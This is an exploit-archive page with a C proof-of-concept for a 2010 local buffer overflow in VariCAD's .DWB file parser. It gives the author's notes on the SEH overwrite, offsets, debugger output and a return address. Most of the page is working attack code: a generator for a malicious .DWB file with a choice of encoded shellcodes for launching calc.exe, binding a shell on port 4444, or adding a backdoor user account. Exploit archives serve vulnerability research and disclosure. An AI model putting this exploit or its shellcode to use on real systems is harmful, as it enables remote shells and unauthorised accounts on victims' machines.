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VariCAD 2010-2.05 EN Local Buffer Overflow

VariCAD 2010-2.05 EN Local Buffer Overflow
Posted Mar 17, 2010
Authored by n00b

VariCAD version 2010-2.05 EN local buffer overflow exploit. Comes with options to spawn calc.exe, bindshell, and add user shellcode.

tags | exploit, overflow, local, shellcode
SHA-256 | 4460d38656f73c9f360f723a858c168d3d22641a33ab3652bde30d4944fb41cc

VariCAD 2010-2.05 EN Local Buffer Overflow

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/*
# Exploit Title: VariCAD 2010-2.05 EN Local buffer overflow :)
# Date: 15 March 2010
# Author: n00b Realname: *carl cope*
# Software Link: http://www.varicad.com/en/home/
# Version: All versions are affected.
# Tested on: Windows xp sp3,Vista sp2,Linux unbuntu
# CVE : [if exists]

-----------------------------------------------------------
- 0day VariCAD 2010-2.05 EN .Dwb file Local buffer overflow -
-----------------------------------------------------------
-Description-
VariCAD is prone to a memcpy() over flow in the
parsing of 4 byte value that is loaded into the
ebx register.!!

VariCAD-Viewer is also vulnerable to this attack although
exploitation is harder due to the Varicad viewer being compiled
with exception handler protection.Although the VarCAD 2010-2.05
Binary was not.

First of all it was just another Read Av and after a wile of
playing with different values i was able to over write the
exception handlers.But the exception handlers was overwrote
with a value i could not find :(.The value was not in the file
at all.So i decided to fill the file with a load of random chars
to find out where the exception handlers had triggered. I was still
in no luck.Then i remembered awhile ago i had the same kind of issue
with the lfs2 exploits.The problem is that the file i was using as a
test was not big enough.The data was just not there to overwrite the
exception handlers with user supplied data and eventually after 26k
of characters was finally able to find the offsets i needed to exploit
this vulnerability.

The value that was loaded into the $EBX register was supplied by the
offsets inside the file that was manipulated by user supplied data.
At this point i knew it would be exploitable.So if you change these
4byte values (0x25,0x5c,0x1f,0x85)it wont work.

to exploit the application open VariCAD 2010-2.05 EN
then go to | File --> Open --> Then chose the malicious dwb file.
-Description-


-Note-
Just a side note this exploit is universal because the address of the
instruction used resides in the exacutable.This has only one down fall
you cant just double click the malicious .DWB file and execute our
shell code that application must be running first.Although we can overcome
this problem by using a different address and buffer but im running out of
time on this exploit.So ill leave that up to your discretion.

Below is a description to getting this to execute via file extension or right
click on file and edit with VariCAD.

----------------------------------------------------------------------------
22856 bytes --> pointer to next seh --> SE handler --> nop --> shell code.
----------------------------------------------------------------------------
-Note-

-Linux-
The linux version is also exploitable this can be seen in the debug
information provided below although our Value_$EBX is loaded into
the $eax register.

(gdb) info reg
eax 0x851f5c25 -2061542363
ecx 0x21476584 558327172
edx 0xbfbcb9ec -1078150676
ebx 0x41414141 1094795585
esp 0xbfbcbc10 0xbfbcbc10
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb71a7940 (LWP 11236)]
0xb75da52f in memcpy () from /lib/libc.so.6
(gdb) bt
#0 0xb75da52f in memcpy () from /lib/libc.so.6
#1 0x08ab2ab2 in ?? ()
#2 0x08ab5bfe in ?? ()
-Linux-

-Shouts and thanks-
Str0ke : Big thanks good work over the years:)
fl0 fl0w: Keep up the good work dood looking good.
aluigi: Nice guy has time for others.
marsu :Got me started with exploitation.
vade79 :Nice guy helped me a few times.

Offensive Security.
Nice job guys looking good and looking forward to
publishing more exploits on your site.

----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!

*/

#include <stdio.h>
#include <windows.h>
#define VariCAD "n00b.DWB"


/*
These are the first few bytes of the header
from DWB file :)
*/

unsigned char First_Header[] =

{
"\x34\x87\x01\x00\x00\x00\x00"
};


/*
Dont change these values these are set for a reason
<TODO>
========================================================
- Windows debug information -
---------------------------
EAX 8F0D5C79
ECX 21479397
EDX 00000001
EBX 851F5C25 <---Here is our 4 byte value loaded into $EBX reg :)
ESP 0011F1F4
EBP 0011F1FC
ESI 09EF0E1C
EDI 00130000 ASCII "Actx " <-- <write av>
EIP 0136E2EA varicad-.0136E2EA
=========================================================
*/

unsigned char Value_$EBX [] =

{
0x25, 0x5c, 0x1f, 0x85
};


/* win32_exec - EXITFUNC=seh CMD=calc Size=330
Encoder=Alpha2 http://metasploit.com */

unsigned char Calc_Shell_Code []=
{
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x48"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x65"
"\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x75\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x5a\x49\x4b\x4c\x4a"
"\x48\x51\x54\x55\x50\x77\x70\x63\x30\x6c\x4b\x43\x75\x35\x6c\x4c"
"\x4b\x41\x6c\x35\x55\x53\x48\x63\x31\x68\x6f\x4c\x4b\x70\x4f\x46"
"\x78\x4e\x6b\x53\x6f\x75\x70\x36\x61\x6a\x4b\x53\x79\x4c\x4b\x55"
"\x64\x4e\x6b\x74\x41\x68\x6e\x75\x61\x4b\x70\x4d\x49\x4c\x6c\x4c"
"\x44\x6b\x70\x42\x54\x35\x57\x78\x41\x6b\x7a\x76\x6d\x63\x31\x58"
"\x42\x68\x6b\x7a\x54\x77\x4b\x70\x54\x55\x74\x75\x54\x32\x55\x6a"
"\x45\x6e\x6b\x31\x4f\x76\x44\x67\x71\x48\x6b\x70\x66\x6c\x4b\x76"
"\x6c\x70\x4b\x4c\x4b\x73\x6f\x75\x4c\x55\x51\x7a\x4b\x4e\x6b\x45"
"\x4c\x6c\x4b\x46\x61\x5a\x4b\x4f\x79\x61\x4c\x57\x54\x45\x54\x49"
"\x53\x76\x51\x49\x50\x62\x44\x4e\x6b\x53\x70\x30\x30\x4b\x35\x4b"
"\x70\x32\x58\x46\x6c\x6c\x4b\x61\x50\x64\x4c\x4c\x4b\x50\x70\x55"
"\x4c\x4e\x4d\x4e\x6b\x43\x58\x76\x68\x48\x6b\x56\x69\x4c\x4b\x6d"
"\x50\x6c\x70\x55\x50\x35\x50\x63\x30\x6c\x4b\x45\x38\x67\x4c\x31"
"\x4f\x74\x71\x39\x66\x53\x50\x63\x66\x4c\x49\x4b\x48\x4c\x43\x4f"
"\x30\x61\x6b\x50\x50\x55\x38\x6a\x50\x6c\x4a\x43\x34\x63\x6f\x55"
"\x38\x6f\x68\x6b\x4e\x4c\x4a\x54\x4e\x53\x67\x79\x6f\x4d\x37\x51"
"\x73\x72\x41\x50\x6c\x42\x43\x47\x70\x65"
};


/* win32_bind - EXITFUNC=seh LPORT=4444 Size=696
Encoder=Alpha2 http://metasploit.com */

unsigned char Bind_Shell_Code [] =
{
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x37\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x69"
"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x79\x32\x42\x42\x32\x41\x42"
"\x42\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x39\x6c\x31"
"\x7a\x4a\x4b\x72\x6d\x59\x78\x78\x79\x59\x6f\x49\x6f\x79\x6f\x45"
"\x30\x4c\x4b\x70\x6c\x61\x34\x34\x64\x6c\x4b\x71\x55\x77\x4c\x4c"
"\x4b\x63\x4c\x43\x35\x41\x68\x56\x61\x68\x6f\x4e\x6b\x70\x4f\x56"
"\x78\x6e\x6b\x51\x4f\x65\x70\x77\x71\x5a\x4b\x31\x59\x6e\x6b\x47"
"\x44\x6e\x6b\x45\x51\x6a\x4e\x75\x61\x6b\x70\x6c\x59\x6e\x4c\x4d"
"\x54\x4f\x30\x31\x64\x54\x47\x59\x51\x39\x5a\x46\x6d\x77\x71\x39"
"\x52\x78\x6b\x6b\x44\x57\x4b\x73\x64\x51\x34\x71\x38\x30\x75\x6d"
"\x35\x6c\x4b\x71\x4f\x74\x64\x73\x31\x78\x6b\x51\x76\x4c\x4b\x74"
"\x4c\x70\x4b\x4e\x6b\x51\x4f\x77\x6c\x36\x61\x4a\x4b\x43\x33\x56"
"\x4c\x4e\x6b\x4c\x49\x30\x6c\x47\x54\x45\x4c\x31\x71\x78\x43\x30"
"\x31\x4b\x6b\x50\x64\x6c\x4b\x50\x43\x70\x30\x4e\x6b\x57\x30\x34"
"\x4c\x4e\x6b\x32\x50\x55\x4c\x6c\x6d\x4e\x6b\x41\x50\x63\x38\x61"
"\x4e\x55\x38\x4e\x6e\x50\x4e\x66\x6e\x4a\x4c\x50\x50\x49\x6f\x6e"
"\x36\x52\x46\x36\x33\x70\x66\x30\x68\x44\x73\x65\x62\x30\x68\x44"
"\x37\x73\x43\x35\x62\x31\x4f\x71\x44\x4b\x4f\x38\x50\x45\x38\x5a"
"\x6b\x78\x6d\x6b\x4c\x75\x6b\x56\x30\x79\x6f\x6b\x66\x61\x4f\x4f"
"\x79\x6b\x55\x43\x56\x4c\x41\x7a\x4d\x37\x78\x35\x52\x66\x35\x50"
"\x6a\x34\x42\x79\x6f\x58\x50\x41\x78\x78\x59\x67\x79\x4c\x35\x6e"
"\x4d\x73\x67\x79\x6f\x4e\x36\x50\x53\x46\x33\x76\x33\x42\x73\x51"
"\x43\x53\x73\x70\x53\x77\x33\x56\x33\x6b\x4f\x78\x50\x65\x36\x43"
"\x58\x66\x71\x31\x4c\x73\x56\x33\x63\x6c\x49\x59\x71\x7a\x35\x30"
"\x68\x4e\x44\x36\x7a\x62\x50\x39\x57\x76\x37\x6b\x4f\x6b\x66\x43"
"\x5a\x32\x30\x72\x71\x32\x75\x39\x6f\x58\x50\x30\x68\x39\x34\x4e"
"\x4d\x66\x4e\x4a\x49\x51\x47\x4b\x4f\x49\x46\x66\x33\x62\x75\x79"
"\x6f\x4a\x70\x62\x48\x4d\x35\x33\x79\x6b\x36\x71\x59\x66\x37\x4b"
"\x4f\x5a\x76\x76\x30\x50\x54\x70\x54\x70\x55\x4b\x4f\x6e\x30\x4a"
"\x33\x30\x68\x4b\x57\x43\x49\x38\x46\x74\x39\x63\x67\x6b\x4f\x58"
"\x56\x61\x45\x4b\x4f\x6e\x30\x51\x76\x41\x7a\x65\x34\x42\x46\x31"
"\x78\x30\x63\x62\x4d\x6f\x79\x6b\x55\x33\x5a\x36\x30\x56\x39\x31"
"\x39\x48\x4c\x4f\x79\x6d\x37\x73\x5a\x33\x74\x6b\x39\x6d\x32\x67"
"\x41\x59\x50\x6c\x33\x6c\x6a\x79\x6e\x33\x72\x54\x6d\x49\x6e\x70"
"\x42\x34\x6c\x6e\x73\x6c\x4d\x30\x7a\x34\x78\x4c\x6b\x4c\x6b\x4c"
"\x6b\x42\x48\x50\x72\x39\x6e\x6d\x63\x52\x36\x49\x6f\x61\x65\x50"
"\x44\x49\x6f\x7a\x76\x63\x6b\x71\x47\x31\x42\x73\x61\x51\x41\x66"
"\x31\x30\x6a\x44\x41\x31\x41\x63\x61\x71\x45\x32\x71\x59\x6f\x6e"
"\x30\x70\x68\x4c\x6d\x6e\x39\x53\x35\x7a\x6e\x41\x43\x49\x6f\x79"
"\x46\x52\x4a\x6b\x4f\x6b\x4f\x65\x67\x4b\x4f\x7a\x70\x6e\x6b\x30"
"\x57\x59\x6c\x6d\x53\x6a\x64\x50\x64\x39\x6f\x5a\x76\x52\x72\x39"
"\x6f\x5a\x70\x50\x68\x58\x70\x6f\x7a\x54\x44\x63\x6f\x52\x73\x4b"
"\x4f\x6a\x76\x49\x6f\x4e\x30\x69"
};

/* win32_adduser - PASS=n00b EXITFUNC=seh USER=n00b Size=476
Encoder=Alpha2 http://metasploit.com */

unsigned char Add_User_Shell_Code []=
{
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x51\x5a\x6a\x67"
"\x58\x50\x30\x41\x31\x41\x42\x6b\x41\x41\x77\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x69\x6c\x7a"
"\x48\x73\x74\x35\x50\x75\x50\x35\x50\x6c\x4b\x41\x55\x75\x6c\x4c"
"\x4b\x41\x6c\x57\x75\x34\x38\x73\x31\x38\x6f\x6e\x6b\x42\x6f\x52"
"\x38\x4c\x4b\x43\x6f\x57\x50\x33\x31\x38\x6b\x42\x69\x6e\x6b\x64"
"\x74\x4c\x4b\x43\x31\x5a\x4e\x64\x71\x39\x50\x6d\x49\x4e\x4c\x4c"
"\x44\x4f\x30\x50\x74\x77\x77\x59\x51\x48\x4a\x34\x4d\x44\x41\x68"
"\x42\x4a\x4b\x49\x64\x57\x4b\x76\x34\x37\x54\x35\x54\x62\x55\x5a"
"\x45\x6e\x6b\x41\x4f\x51\x34\x63\x31\x58\x6b\x73\x56\x6c\x4b\x66"
"\x6c\x62\x6b\x4e\x6b\x33\x6f\x55\x4c\x44\x41\x38\x6b\x6c\x4b\x47"
"\x6c\x6c\x4b\x44\x41\x48\x6b\x6b\x39\x51\x4c\x45\x74\x33\x34\x4f"
"\x33\x46\x51\x4b\x70\x51\x74\x4e\x6b\x73\x70\x70\x30\x4e\x65\x4f"
"\x30\x54\x38\x44\x4c\x4e\x6b\x51\x50\x66\x6c\x6e\x6b\x30\x70\x75"
"\x4c\x6e\x4d\x4c\x4b\x30\x68\x43\x38\x38\x6b\x47\x79\x4e\x6b\x4f"
"\x70\x58\x30\x77\x70\x57\x70\x37\x70\x4e\x6b\x70\x68\x65\x6c\x61"
"\x4f\x35\x61\x59\x66\x31\x70\x61\x46\x6b\x39\x39\x68\x6c\x43\x6f"
"\x30\x43\x4b\x72\x70\x71\x78\x58\x70\x6e\x6a\x55\x54\x73\x6f\x50"
"\x68\x4e\x78\x4b\x4e\x6e\x6a\x44\x4e\x50\x57\x59\x6f\x6d\x37\x33"
"\x53\x30\x6d\x70\x64\x56\x4e\x31\x75\x71\x68\x71\x75\x65\x70\x46"
"\x4f\x53\x53\x55\x70\x52\x4e\x53\x55\x41\x64\x31\x30\x71\x65\x52"
"\x53\x75\x35\x44\x32\x35\x70\x30\x6e\x36\x50\x70\x30\x30\x62\x45"
"\x70\x42\x4e\x64\x70\x64\x70\x30\x62\x77\x50\x76\x4f\x33\x71\x32"
"\x64\x42\x64\x51\x30\x61\x36\x37\x56\x57\x50\x70\x6e\x41\x75\x64"
"\x34\x65\x70\x42\x4c\x32\x4f\x53\x53\x71\x71\x50\x6c\x41\x77\x42"
"\x52\x30\x6f\x30\x75\x30\x70\x75\x70\x57\x31\x63\x54\x70\x6d\x41"
"\x79\x30\x6e\x45\x39\x64\x33\x63\x44\x52\x52\x51\x71\x50\x74\x32"
"\x4f\x70\x72\x53\x43\x35\x70\x52\x4e\x30\x30\x50\x30\x75\x32\x55"
"\x70\x36\x4f\x50\x41\x30\x44\x43\x74\x77\x70\x67"
};




unsigned char Buffer ='A';
char *Jmp = "\xeb\x06\x90\x90";


/*
This address is universal and was found within the
VariCAD-2010-2.05-EN.exe.There are no dlls loaded
that come VariCAD so finding a suitable instructions
wasn't so easy :).
The executable is not compiled with safe seh.
====================================================
00401425 5E POP ESI
00401426 83C4 10 ADD ESP,10
00401429 C3 RETN
*/

char *address = "\x25\x14\x40\x00";

char Banner [] =
{
"-------------------------------------------------\n"
"*************************************************\n"
"* VariCAD 2010-2.05 EN *\n"
"*************************************************\n"
"* BIG SHOUTS TO str0ke!!! *\n"
"* Long live milw0rm *\n"
"*************************************************\n"
"* n00b!! *\n"
"* Release Date :17th March 2010. *\n"
"*************************************************\n"
"* ------------------------------------------- *\n"
"-------------------------------------------------\n"
"exploit created by n00b!!\n"
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
"[1]. Calc Shell_Code\n"
"[2]. Bind Shell_Code on port 4444\n"
"[3]. Add user Shell_Code\n"
"[4]. To exit and cancel\n"
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
"Please chose your Shell_Code:\n"

};


int main()
{

int i,Cmd;
int Close_File;

/*Create file pointer*/
FILE *fp;

if ((fp = fopen(VariCAD, "wb")) == NULL)
{
printf("File %s write error\n", VariCAD);
return(0);
}


for (i=0; i<sizeof(First_Header); i++)
fputc(First_Header[i], fp);
for (i=0; i<sizeof(Value_$EBX); i++) /*Dont change the values :)*/
fputc(Value_$EBX[i], fp);
for (i=0;i<26252;i++)
fwrite(&Buffer,1,1,fp);
for (i=0; i<sizeof(Jmp); i++)
fputc(Jmp[i], fp);
for (i=0; i<sizeof(address); i++)
fputc(address[i], fp);

printf("%s ", Banner);
scanf( "%d", &Cmd );
switch ( Cmd )
{
case 1:
fputs(Calc_Shell_Code,fp);
break;
case 2:
fputs(Bind_Shell_Code,fp);
break;
case 3:
fputs(Add_User_Shell_Code,fp);
break;
case 4:
return(1);
break;
}
Close_File = fclose (fp);
return(0);
}

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